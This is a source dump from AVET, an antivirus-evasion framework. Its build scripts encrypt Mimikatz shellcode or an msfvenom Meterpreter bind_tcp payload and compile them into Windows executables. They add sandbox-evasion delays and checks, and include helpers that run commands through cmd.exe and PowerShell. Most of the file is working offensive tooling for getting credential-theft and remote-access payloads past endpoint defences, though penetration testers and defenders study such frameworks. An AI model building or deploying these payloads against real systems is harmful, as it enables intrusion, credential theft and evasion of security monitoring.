66 | # compile to exe file 67 | $win64_compiler -o output/sleepbyping_rc4_mimikatz.exe source/avet.c 68 | strip output/sleepbyping_rc4_mimikatz.exe 69 | 70 | # cleanup 71 | cleanup_techniques 72 | 73 | 74 | echo " 75 | # The decryption key is aabbccdd1122 if it has not been changed. 76 | # You need to provide the decryption key as 2nd command line argument. 
77 | # Call generated executable on target like: 78 | # $ sleepbyping_rc4_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 79 | " 80 | -------------------------------------------------------------------------------- /build/build_timedfibonacci_rc4_mimikatz.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #DESCRIPTION_START 4 | # Performs dummy computations for five minutes before executing the payload, attempting to timeout sandboxes. 5 | # RC4-encrypt the payload with a static, preset key. 6 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 7 | # pe_to_shellcode is written by Hasherezade: 8 | # https://github.com/hasherezade/pe_to_shellcode 9 | 10 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 11 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 12 | #DESCRIPTION_END 13 | 14 | # print AVET logo 15 | cat banner.txt 16 | 17 | # include script containing the compiler var $win64_compiler 18 | # you can edit the compiler in build/global_win64.sh 19 | # or enter $win64_compiler="mycompiler" here 20 | . build/global_win64.sh 21 | 22 | # import feature construction interface 23 | . 
build/feature_construction.sh 24 | 25 | 26 | #CONFIGURATION_START 27 | # enable debug output (DEBUG_PRINT then reports every applied technique on stdout, see debug_print.h; keep this for lab testing only) 28 | enable_debug_print 29 | # generate key file with preset key 30 | generate_key preset aabbccdd1122 input/key_raw.txt 31 | #CONFIGURATION_END 32 | 33 | # perform dummy Fibonacci computations for 300 seconds before executing the payload, trying to outlast sandbox analysis time 34 | add_evasion computation_timed_fibonacci 300 35 | 36 | # no command execution 37 | set_command_source no_data 38 | set_command_exec no_command 39 | 40 | # convert mimikatz executable into shellcode format 41 | # Can be of course used with other .exe files 42 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 43 | # encrypt payload 44 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 45 | 46 | # convert encoded, raw payload into c format for static include 47 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 48 | 49 | # set payload source 50 | set_payload_source static_from_file input/sc_enc_c.txt 51 | 52 | # set decoder 53 | set_decoder rc4 54 | 55 | # convert key to c format and include statically 56 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 57 | set_key_source static_from_file input/key_c.txt 58 | 59 | # set payload info source 60 | set_payload_info_source no_data 61 | 62 | # set shellcode binding technique 63 | set_payload_execution_method exec_shellcode64 64 | 65 | 66 | # compile to exe file 67 | $win64_compiler -o output/timedfibonacci_rc4_mimikatz.exe source/avet.c 68 | strip output/timedfibonacci_rc4_mimikatz.exe 69 | 70 | # cleanup 71 | cleanup_techniques 72 | 73 | 74 | echo " 75 | # The decryption key is aabbccdd1122 if it has not been changed. 76 | # Note: this build compiles the key into the executable (set_key_source static_from_file above), so it should not need to be supplied on the command line - confirm against source/avet.c before relying on this. 
77 | # Call generated executable on target like: 78 | # $ timedfibo_rc4_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 79 | " 80 | -------------------------------------------------------------------------------- /build/buildsvc_20xshikata_bindtcp_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Designed for use with msf psexec module! 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | # no command preexec 28 | set_command_source no_data 29 | set_command_exec no_command 30 | # generate key file 31 | generate_key preset aabbcc12de input/key_raw.txt 32 | #CONFIGURATION_END 33 | 34 | 35 | # make meterpreter bind payload, encoded 20 rounds with shikata_ga_nai 36 | msfvenom -p windows/meterpreter/bind_tcp lport=$LPORT -e x86/shikata_ga_nai -i 20 -f raw -a x86 --platform Windows > input/sc_raw.txt 37 | 38 | # add evasion techniques 39 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 40 | add_evasion gethostbyname_sandbox_evasion 'this.that' 41 | 42 | # encode shellcode 43 | encode_payload xor input/sc_raw.txt input/scenc_raw.txt input/key_raw.txt 44 | 45 | # array name buf is expected by static_from_file retrieval method 46 | ./tools/data_raw_to_c/data_raw_to_c input/scenc_raw.txt input/scenc_c.txt buf 47 | 48 | # set shellcode source 49 | set_payload_source static_from_file 
input/scenc_c.txt 50 | 51 | # convert generated key from raw to C into array "key" 52 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 53 | 54 | # set key source 55 | set_key_source static_from_file input/key_c.txt 56 | 57 | # set payload info source 58 | set_payload_info_source no_data 59 | 60 | # set decoder 61 | set_decoder xor 62 | 63 | # set shellcode binding technique 64 | set_payload_execution_method exec_shellcode 65 | 66 | # enable debug printing to a file on the target. NOTE(review): with to_file, DEBUG_PRINT (debug_print.h) appends every debug line, including the names of the evasion techniques applied, to C:/avetdbg.txt on the target host. That is a plaintext forensic artifact; keep it for lab testing and remove it for anything real. 67 | enable_debug_print to_file C:/avetdbg.txt 68 | 69 | # compile 70 | $win32_compiler -o output/svc_20xshikata_bindtcp_win32.exe source/avetsvc.c -lws2_32 71 | strip output/svc_20xshikata_bindtcp_win32.exe 72 | 73 | # cleanup 74 | cleanup_techniques 75 | 76 | echo " 77 | # Execute the following command: 78 | # $ svc_20xshikata_bindtcp_win32.exe 79 | " 80 | 81 | -------------------------------------------------------------------------------- /build/global_connect_config.sh: -------------------------------------------------------------------------------- 1 | # definition of default lhost/lport values for all build scripts 2 | # change to your desired default values here, if necessary 3 | GLOBAL_LHOST=192.168.56.101 4 | GLOBAL_LPORT=443 5 | -------------------------------------------------------------------------------- /build/global_win32.sh: -------------------------------------------------------------------------------- 1 | win32_compiler="i686-w64-mingw32-gcc" 2 | win32cpp_compiler="i686-w64-mingw32-g++" 3 | # win32_compiler="wine gcc -m32" 4 | -------------------------------------------------------------------------------- /build/global_win64.sh: -------------------------------------------------------------------------------- 1 | win64_compiler="x86_64-w64-mingw32-gcc" 2 | win64cpp_compiler="x86_64-w64-mingw32-g++" 3 | # win64_compiler="wine gcc -m64" 4 | -------------------------------------------------------------------------------- /build_script_tester.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import os 4 | import glob 5 | import subprocess 6 | import re 7 | 8 | # get list of build scripts and create directory named testing 9 | build_scripts = glob.glob('./build/build*.sh') 10 | count = len(build_scripts) 11 | 12 | if not os.path.isdir("./testing"): 13 | os.mkdir("./testing") 14 | 15 | 16 | # Create File. If it exists already, it will be cleared 17 | open("./testing/result.txt", 'w').close() 18 | 19 | 20 | # prepare for summary 21 | failed = "Build Scripts with errors:\n" 22 | 23 | 24 | # run all build scripts and save output in buffer 25 | buffer = [] 26 | current = 1 27 | for script in build_scripts: 28 | print("\n[%d/%d]\t--Testing %s--" % (current, count, script[8:])) 29 | process = subprocess.run( 30 | [script], stdout=subprocess.PIPE, stderr=subprocess.STDOUT) 31 | output = process.stdout.decode("utf-8") 32 | 33 | buffer.append("--Testing %s--\n%s" % (script[8:], output)) 34 | 35 | current_script = script[14:-3] 36 | 37 | # test for errors while building 38 | # Search for keywords in stdout and stderr 39 | keywords = ["cannot find", "fault", "unable", "error", "Error", 40 | "Unable", "No such file or directory", "warning", "undeclared"] 41 | if any(x in output for x in keywords): 42 | failed += "%s:\n" % current_script 43 | for item in keywords: 44 | finding = re.search(".*"+item+".*", output) 45 | if bool(finding): 46 | print(finding.group()) 47 | failed += "\t%s:\n" % finding.group() 48 | 49 | # test if .exe is generated 50 | if os.path.isfile("./output/%s.exe" % current_script): 51 | print("%s executable could be created\n" % current_script) 52 | else: 53 | print("%s executable could NOT be created\n" % current_script) 54 | failed += "\t%s executable could NOT be created\n" % current_script 55 | current += 1 56 | 57 | 58 | # print summary 59 | summary = "---------------------------Summary---------------------------\n" 60 | summary += 
failed 61 | 62 | print(summary) 63 | 64 | 65 | # write buffer in file result.txt 66 | buffer.append(summary) 67 | with open("./testing/result.txt", 'w') as result: 68 | result.writelines(buffer) 69 | -------------------------------------------------------------------------------- /images/pm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/images/pm.png -------------------------------------------------------------------------------- /input/dummy.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/input/dummy.txt -------------------------------------------------------------------------------- /input/goodware_samples/put_goodware_here.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/input/goodware_samples/put_goodware_here.txt -------------------------------------------------------------------------------- /output/dummy.txt: -------------------------------------------------------------------------------- 1 | dummy 2 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | autopep8==2.0.0 2 | certifi==2022.9.24 3 | charset-normalizer==2.1.1 4 | contourpy==1.0.6 5 | cycler==0.11.0 6 | fonttools==4.38.0 7 | idna==3.4 8 | joblib==1.2.0 9 | kiwisolver==1.4.4 10 | lief==0.12.2 11 | matplotlib==3.0.3 12 | mpmath==1.2.1 13 | networkx==3.0rc1 14 | numpy==1.23.4 15 | nvidia-cublas-cu11==11.10.3.66 16 | nvidia-cuda-nvrtc-cu11==11.7.99 17 | nvidia-cuda-runtime-cu11==11.7.99 18 | nvidia-cudnn-cu11==8.5.0.96 19 | packaging==21.3 20 | Pillow==9.3.0 21 | pycodestyle==2.9.1 22 | 
pyparsing==3.0.9 23 | python-dateutil==2.8.2 24 | python-magic==0.4.27 25 | requests==2.28.1 26 | scikit-learn==1.1.3 27 | scipy==1.9.3 28 | secml==0.13.post1 29 | six==1.16.0 30 | sympy==1.11.1 31 | threadpoolctl==3.1.0 32 | tomli==2.0.1 33 | torch==1.14.0.dev20221115+cu117 34 | torchaudio==0.14.0.dev20221115+cu117 35 | torchvision==0.15.0.dev20221115+cu117 36 | typing_extensions==4.4.0 37 | urllib3==1.26.12 38 | -------------------------------------------------------------------------------- /setup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # This is a setup script to get AVET ready to use on a 64-bit Kali system. 3 | # You still have to "next" through the tdm-gcc installer GUI, though. 4 | 5 | echo "+++ Preparing AVET for use..." 6 | 7 | echo "+++ Installing wine and wine32" 8 | # add missing sources for wine32 9 | sudo dpkg --add-architecture i386 10 | sudo apt update 11 | sudo apt install wine -y 12 | sudo apt install wine32 -y 13 | 14 | # Install mingw crosscompiler 15 | sudo apt install mingw-w64 -y 16 | sudo apt install jq -y 17 | 18 | echo "+++ Downloading and installing tdm-gcc via wine" # NOTE(review): the installer below is downloaded and executed without any checksum or signature check; pin the release and verify its SHA-256 (sha256sum -c) before running it under wine, otherwise a tampered download gets code execution on the build host. 19 | wget https://github.com/jmeubank/tdm-gcc/releases/download/v9.2.0-tdm64-1/tdm64-gcc-9.2.0.exe 20 | wine tdm64-gcc-9.2.0.exe 21 | rm tdm64-gcc-9.2.0.exe 22 | 23 | 24 | while true; do 25 | read -p "Do you want to download the dependencies AVET needs? 
[y/n]" yn 26 | case $yn in 27 | [Yy]* ) # Install dependencies 28 | echo "+++ Downloading Mimikatz" 29 | curl -s https://api.github.com/repos/gentilkiwi/mimikatz/releases/latest \ 30 | | jq -r '.assets[].browser_download_url' \ 31 | | grep .'zip' \ 32 | | wget -i - 33 | unzip -j mimikatz_trunk.zip x64/mimikatz.exe -d input/ 34 | rm mimikatz_trunk.zip 35 | 36 | echo "+++ Downloading pe2shc" 37 | mkdir ../pe_to_shellcode 38 | curl -s https://api.github.com/repos/hasherezade/pe_to_shellcode/releases/latest \ 39 | | jq -r '.assets[].browser_download_url' \ 40 | | grep 'pe2shc' \ 41 | | wget -i - 42 | mv pe2shc.exe ../pe_to_shellcode 43 | 44 | echo "+++ Cloning DKMC" 45 | git clone https://github.com/Mr-Un1k0d3r/DKMC.git 46 | mv DKMC/ ../ ; break;; 47 | [Nn]* ) 48 | echo "Dependencies not installed!" 49 | break;; 50 | * ) echo "Please answer yes or no.";; 51 | esac 52 | done 53 | 54 | echo "+++ Finished setup procedure!" 55 | -------------------------------------------------------------------------------- /source/command_exec/command_exec.assign: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/command_exec/command_exec.include: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/debug_print/debug_print.include: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/decode_payload/decode_payload.assign: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/decode_payload/decode_payload.include: -------------------------------------------------------------------------------- 1 | 
2 | -------------------------------------------------------------------------------- /source/evasion/evasion.assign: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/evasion/evasion.include: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/get_command/get_command.assign: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/get_command/get_command.include: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/get_key/get_key.assign: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/get_key/get_key.include: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/get_payload/get_payload.assign: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/get_payload/get_payload.include: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/get_payload_info/get_payload_info.assign: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- 
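/source/get_payload_info/get_payload_info.include: -------------------------------------------------------------------------------- 1 | 2 | --------------------------------------------------------------------------------
/source/implementations/command_exec/exec_via_cmd.h:
--------------------------------------------------------------------------------
#pragma once

#include 
#include "../debug_print/debug_print.h"


// Starts cmd.exe via system() and executes the command specified.
// command_size is accepted for interface parity with the other command_exec
// implementations; system() reads the command up to its NUL terminator.
void exec_via_cmd(const char *command, int command_size) {
    DEBUG_PRINT("exec_via_cmd called.\n");
    DEBUG_PRINT("Passing command %s to cmd.exe\n", command);
    system(command);
}
--------------------------------------------------------------------------------
/source/implementations/command_exec/exec_via_powershell.h:
--------------------------------------------------------------------------------
#pragma once

#include 
#include 
#include "../debug_print/debug_print.h"


// Starts powershell.exe via system() and executes the command specified.
//
// command:      NUL-terminated command line handed to powershell.exe
//               (strlen() is used, so an unterminated buffer is still read too far)
// command_size: length budget for command; the copy is bounded by it, so a
//               command longer than command_size is truncated instead of
//               overflowing the buffer (the original strcat trusted strlen only).
//
// Does nothing if command is NULL or the buffer cannot be allocated.
void exec_via_powershell(const char *command, int command_size) {
    DEBUG_PRINT("exec_via_powershell called.\n");

    if (command == NULL) {
        DEBUG_PRINT("exec_via_powershell: no command given, nothing executed.\n");
        return;
    }

    const char *powershell_call = "powershell.exe ";
    size_t prefix_len = strlen(powershell_call);

    // Never copy more than the caller's declared size.
    size_t command_len = strlen(command);
    size_t budget = command_size > 0 ? (size_t) command_size : 0;
    if (command_len > budget) {
        command_len = budget;
    }

    char *system_arg = malloc(prefix_len + command_len + 1);
    if (system_arg == NULL) {
        DEBUG_PRINT("exec_via_powershell: allocation failed, command not executed.\n");
        return;
    }

    memcpy(system_arg, powershell_call, prefix_len);
    memcpy(system_arg + prefix_len, command, command_len);
    system_arg[prefix_len + command_len] = '\0';

    // system() goes through cmd.exe, which in turn launches powershell.exe.
    DEBUG_PRINT("Passing argument %s to cmd.exe\n", system_arg);

    system(system_arg);
    free(system_arg);
}
--------------------------------------------------------------------------------
/source/implementations/command_exec/no_command.h:
--------------------------------------------------------------------------------
#pragma once

#include "../debug_print/debug_print.h"


// Dummy function to handle cases where no command is executed.
// In that case, both arguments command and command_size are ignored.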
8 | void no_command(const char *command, int command_size) { 9 | DEBUG_PRINT("\"no_command\" command_exec function called.\n"); 10 | } 11 | -------------------------------------------------------------------------------- /source/implementations/debug_print/debug_print.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | 4 | // Defines the DEBUG_PRINT macro. 5 | // DEBUG_PRINT writes to stdout by default, or into a logfile instead if the DEBUG_TO_FILE define is set. 6 | // Use DEBUG_PRINT like printf: DEBUG_PRINT("My string: %s\n", my_string); 7 | 8 | 9 | #ifdef DEBUG 10 | #include 11 | 12 | #ifdef DEBUG_TO_FILE 13 | #include 14 | 15 | // Definition of LOGFILE should be enforced by enable_debug_output. 16 | // Check anyways in case something went wrong. 17 | #ifndef LOGFILE 18 | #define LOGFILE "C:\\users\\public\\avetdbg.txt" 19 | #endif 20 | 21 | // Debug output is written to file instead when DEBUG_TO_FILE is set (as in avetsvc) 22 | int DEBUG_PRINT(char *format, ...) { 23 | va_list args; 24 | va_start(args, format); 25 | 26 | FILE *logfile; 27 | logfile = fopen(LOGFILE, "a+"); 28 | if(logfile == NULL) { 29 | return -1; 30 | } 31 | vfprintf(logfile, format, args); 32 | fclose(logfile); 33 | 34 | va_end(args); 35 | 36 | return 0; 37 | } 38 | #else 39 | // Debug output via printf 40 | #define DEBUG_PRINT(...) printf(__VA_ARGS__) 41 | #endif 42 | #else 43 | // Substitute function call with 0 expression, so that debug strings are purged from the executable 44 | #define DEBUG_PRINT(...) 
0 45 | #endif 46 | -------------------------------------------------------------------------------- /source/implementations/encoding/avet/avet_decoder.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "../../debug_print/debug_print.h" 5 | 6 | 7 | // return pointer to payload 8 | unsigned char* avet_decoder(const unsigned char *buffer, unsigned char *payload, int size) 9 | { 10 | DEBUG_PRINT("This is AVET decoder.\n"); 11 | int j=0; 12 | payload=malloc((size/2)); 13 | 14 | DEBUG_PRINT("decode_payload, size for malloc: %d\nPayload output:\n", size/2); 15 | 16 | int i=0; 17 | do 18 | { 19 | unsigned char temp[3]={0}; 20 | sprintf((char*)temp,"%c%c",buffer[i],buffer[i+1]); 21 | payload[j] = strtoul(temp, NULL, 16); 22 | 23 | DEBUG_PRINT("%x",payload[j]); 24 | 25 | i+=2; 26 | j++; 27 | } while(i $2 6 | 7 | -------------------------------------------------------------------------------- /source/implementations/encoding/avet/sh_format: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/source/implementations/encoding/avet/sh_format -------------------------------------------------------------------------------- /source/implementations/encoding/none/none_decoder.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "../../debug_print/debug_print.h" 5 | 6 | 7 | // Dummy function to handle options where no encoding/decoding is applied at all 8 | void decode_none(const unsigned char *ciphertext, const int ciphertext_length, const unsigned char *key, const int key_length, unsigned char *plaintext) { 9 | DEBUG_PRINT("decode_none function called \n"); 10 | memcpy(plaintext, ciphertext, ciphertext_length); 11 | } 12 | -------------------------------------------------------------------------------- 
/source/implementations/encoding/rc4/rc4.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | const int N = 256; // 2^8 4 | 5 | 6 | void swap(unsigned char *a, unsigned char *b) { 7 | int tmp = *a; 8 | *a = *b; 9 | *b = tmp; 10 | } 11 | 12 | 13 | int KSA(const unsigned char *key, unsigned char *S, const int key_length) { 14 | int j = 0; 15 | 16 | for(int i = 0; i < N; i++) 17 | S[i] = i; 18 | 19 | for(int i = 0; i < N; i++) { 20 | j = (j + S[i] + key[i % key_length]) % N; 21 | 22 | swap(&S[i], &S[j]); 23 | } 24 | 25 | return 0; 26 | } 27 | 28 | 29 | int PRGA(unsigned char *S, const unsigned char *plaintext, unsigned char *ciphertext, const int plaintext_length) { 30 | int i = 0; 31 | int j = 0; 32 | 33 | for(int n = 0; n < plaintext_length; n++) { 34 | i = (i + 1) % N; 35 | j = (j + S[i]) % N; 36 | 37 | swap(&S[i], &S[j]); 38 | int rnd = S[(S[i] + S[j]) % N]; 39 | 40 | ciphertext[n] = rnd ^ plaintext[n]; 41 | 42 | } 43 | 44 | return 0; 45 | } 46 | 47 | 48 | // RC4 encryption routine. 49 | // Encrypts the given plaintext with the supplied key, and stores the result in ciphertext. 50 | // Supports variable key length, within reason. 51 | void RC4(const unsigned char *plaintext, const int plaintext_length, const unsigned char *key, const int key_length, unsigned char *ciphertext) { 52 | unsigned char S[N]; 53 | KSA(key, S, key_length); 54 | PRGA(S, plaintext, ciphertext, plaintext_length); 55 | } 56 | -------------------------------------------------------------------------------- /source/implementations/encoding/rc4/rc4_decoder.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "../../debug_print/debug_print.h" 4 | #include "rc4.h" 5 | 6 | 7 | // RC4-decrypts the ciphertext with the key and stores the result in plaintext. 
8 | // To do this, the RC4 function is applied reverse to encryption, with the ciphertext posing as the plain text, and vice versa. 9 | void decode_rc4(const unsigned char *ciphertext, const int ciphertext_length, const unsigned char *key, const int key_length, unsigned char *plaintext) { 10 | DEBUG_PRINT("This is RC4 decoder.\n"); 11 | // Function signature: 12 | // void RC4(const unsigned char *plaintext, const int plaintext_length, const unsigned char *key, const int key_length, unsigned char *ciphertext) 13 | RC4(ciphertext, ciphertext_length, key, key_length, plaintext); 14 | } 15 | -------------------------------------------------------------------------------- /source/implementations/encoding/rc4/rc4_encoder: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/source/implementations/encoding/rc4/rc4_encoder -------------------------------------------------------------------------------- /source/implementations/encoding/rc4/rc4_encoder.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "../../../data_utility.h" 4 | #include "rc4.h" 5 | 6 | 7 | // Arguments expected: 8 | // argv[1]: Name of the file containing the payload to be encoded (raw format expected) 9 | // argv[2]: Name of the file where the encoded payload shall be written to 10 | // argv[3]: Name of the file the key to be applied is stored (raw format) 11 | int main(int argc, char **argv) { 12 | int payload_size; 13 | int key_length; 14 | 15 | printf("Starting RC4 encoder...\n"); 16 | 17 | // Read payload from file into memory 18 | printf("Reading payload from file %s, expecting raw format.\n", argv[1]); 19 | unsigned char *payload = data_from_file_raw(argv[1], &payload_size); 20 | printf("payload size in bytes is %d\n", payload_size); 21 | 22 | // Read encryption key from file into memory 23 | printf("Reading 
key from file %s, expecting raw format.\n", argv[3]); 24 | unsigned char *key = data_from_file_raw(argv[3], &key_length); 25 | printf("Key length in bytes is %d\n", key_length); 26 | 27 | // Encrypt and write ciphertext to file 28 | unsigned char *ciphertext = (unsigned char *) malloc(payload_size); 29 | printf("Applying RC4 algorithm\n"); 30 | RC4(payload, payload_size, key, key_length, ciphertext); 31 | printf("Writing payload to file %s\n", argv[2]); 32 | data_to_file_raw(ciphertext, payload_size, argv[2]); 33 | 34 | return 0; 35 | } 36 | -------------------------------------------------------------------------------- /source/implementations/encoding/xor/xor_decoder.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "../../debug_print/debug_print.h" 4 | 5 | 6 | // XORs the ciphertext with the key and stores the result in plaintext. 7 | // The key bytes are applied succesively. The ciphertext_length is not required to be a multiple of the key_length. 
8 | void decode_xor(const unsigned char *ciphertext, const int ciphertext_length, const unsigned char *key, const int key_length, unsigned char *plaintext) { 9 | DEBUG_PRINT("This is XOR decoder.\n"); 10 | for(int i = 0; i < ciphertext_length; i++) { 11 | plaintext[i] = ciphertext[i] ^ key[i % key_length]; 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /source/implementations/encoding/xor/xor_encoder: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/source/implementations/encoding/xor/xor_encoder -------------------------------------------------------------------------------- /source/implementations/encoding/xor/xor_encoder.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "../../../data_utility.h" 4 | 5 | 6 | // XORs the plaintext with key bytes and stores the result in ciphertext. 7 | // Can handle multi-byte keys, key bytes are then applied successively. 8 | // Plaintext length is not required to be a multiple of the key length, the procedure just stops when the plaintext ends. 
9 | void xor_encode(const unsigned char *plaintext, const int plaintext_length, const unsigned char *key, const int key_length, unsigned char *ciphertext) { 10 | for(int i = 0; i < plaintext_length; i++) { 11 | ciphertext[i] = plaintext[i] ^ key[i % key_length]; 12 | } 13 | } 14 | 15 | 16 | // Arguments expected: 17 | // argv[1]: Name of the file containing the payload to be encoded (raw format expected) 18 | // argv[2]: Name of the file where the encoded payload shall be written to 19 | // argv[3]: Name of the file the key to be applied is stored (raw format) 20 | int main(int argc, char **argv) { 21 | int payload_size; 22 | int key_length; 23 | 24 | printf("Starting XOR encoder...\n"); 25 | 26 | // Read payload from file into memory 27 | printf("Reading payload from file %s, expecting raw format.\n", argv[1]); 28 | unsigned char *payload = data_from_file_raw(argv[1], &payload_size); 29 | printf("payload size in bytes is %d\n", payload_size); 30 | 31 | // Read encryption key from file into memory 32 | printf("Reading key from file %s, expecting raw format.\n", argv[3]); 33 | unsigned char *key = data_from_file_raw(argv[3], &key_length); 34 | printf("Key length in bytes is %d\n", key_length); 35 | 36 | // Encrypt and write ciphertext to file 37 | unsigned char *ciphertext = (unsigned char *) malloc(payload_size); 38 | printf("Applying XOR algorithm\n"); 39 | xor_encode(payload, payload_size, key, key_length, ciphertext); 40 | printf("Writing payload to file %s\n", argv[2]); 41 | data_to_file_raw(ciphertext, payload_size, argv[2]); 42 | 43 | return 0; 44 | } 45 | -------------------------------------------------------------------------------- /source/implementations/evasion/check_fast_forwarding.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "../debug_print/debug_print.h" 9 | 10 | u_int64 Delta(const SYSTEMTIME st1, const SYSTEMTIME 
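st2) {
    union timeunion
    {
        FILETIME fileTime;
        ULARGE_INTEGER ul;
    };

    FILETIME ft1;
    FILETIME ft2;

    SystemTimeToFileTime(&st1, &ft1);
    SystemTimeToFileTime(&st2, &ft2);

    ULARGE_INTEGER u1 = {0};
    ULARGE_INTEGER u2 = {0};

    memcpy(&u1, &ft1, sizeof(u1));
    memcpy(&u2, &ft2, sizeof(u2));

    return u2.QuadPart - u1.QuadPart;
}

// Check whether the sandbox fast-forwards Sleep() to cut heuristic analysis time.
//
// Take the local time before and after Sleep() and compare the measured
// difference (FILETIME ticks of 100 ns) with the requested wait. Proceed only
// if at least the requested time really elapsed on the wall clock, with one
// second of slack for timer granularity; a sandbox that returns from Sleep()
// early without advancing the clock fails the check and the program exits.
//
// arg1: time in seconds (decimal string; negative values are treated as 0)
void check_fast_forwarding(char *arg1) {
    DEBUG_PRINT("Applying check_fast_forwarding technique.\n");

    // Reject negative input instead of passing a huge DWORD to Sleep().
    int time = atoi(arg1);
    if (time < 0) {
        time = 0;
    }

    SYSTEMTIME before_sleep;
    SYSTEMTIME after_sleep;

    GetLocalTime(&before_sleep);

    DEBUG_PRINT("Time before sleep: %d:%d:%d\n", before_sleep.wHour, before_sleep.wMinute, before_sleep.wSecond);
    DEBUG_PRINT("Sleeping for %s Seconds...\n", arg1);

    Sleep((DWORD) time * 1000);

    GetLocalTime(&after_sleep);

    // Delta() yields FILETIME ticks: 10^7 ticks per second.
    const u_int64 ticks_per_second = 10000000ULL;
    u_int64 elapsed_ticks = Delta(before_sleep, after_sleep);
    u_int64 expected_ticks = (u_int64) time * ticks_per_second;

    // The original used %s for an integer argument (undefined behaviour).
    DEBUG_PRINT("Time difference %lu Seconds...\n", (unsigned long) (elapsed_ticks / ticks_per_second));

    // The original compared seconds against raw ticks, which never match, so the
    // stub exited unconditionally. Compare in the same unit and allow one
    // second of slack for the clock resolution of GetLocalTime().
    if (elapsed_ticks + ticks_per_second >= expected_ticks) {
        DEBUG_PRINT("Proceed!\n");
    } else {
        exit(0);
    }
}
-------------------------------------------------------------------------------- /source/implementations/evasion/computation_fibonacci.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "../debug_print/debug_print.h" 5 | 6 | 7 | // Compute arg1 iterations of the Fibonacci series. 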
// (Will likely produce false results for greater n due to modulo reduction inside integer boundaries)
//
// arg1: Number of iterations to compute
//
// Compute-bound delay loop: runs the Fibonacci recurrence n - 2 times, where
// n = atoi(arg1). `i` starts at 2, so n <= 2 performs no iteration and `c`
// stays 0. Unsigned arithmetic wraps silently, hence the caveat above.
// This technique never exits the process; its only side effect is the printf.
void computation_fibonacci(char *arg1) {
    int n = atoi(arg1);
    DEBUG_PRINT("Computing the %sth number of the fibonacci series...\n", arg1);

    unsigned int a = 0;
    unsigned int b = 1;
    unsigned int c = 0;

    int i = 2;
    while (i < n) {
        c = a + b;
        a = b;
        b = c;
        i++;
    }

    // Ensure that the computed value is used at the end of the data flow to avoid dead code.
    printf("Number is %u.", c);
}
--------------------------------------------------------------------------------
/source/implementations/evasion/computation_timed_fibonacci.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include "../debug_print/debug_print.h"


// Computes iterations of the Fibonacci series. Stops computations after approximately arg1 seconds.
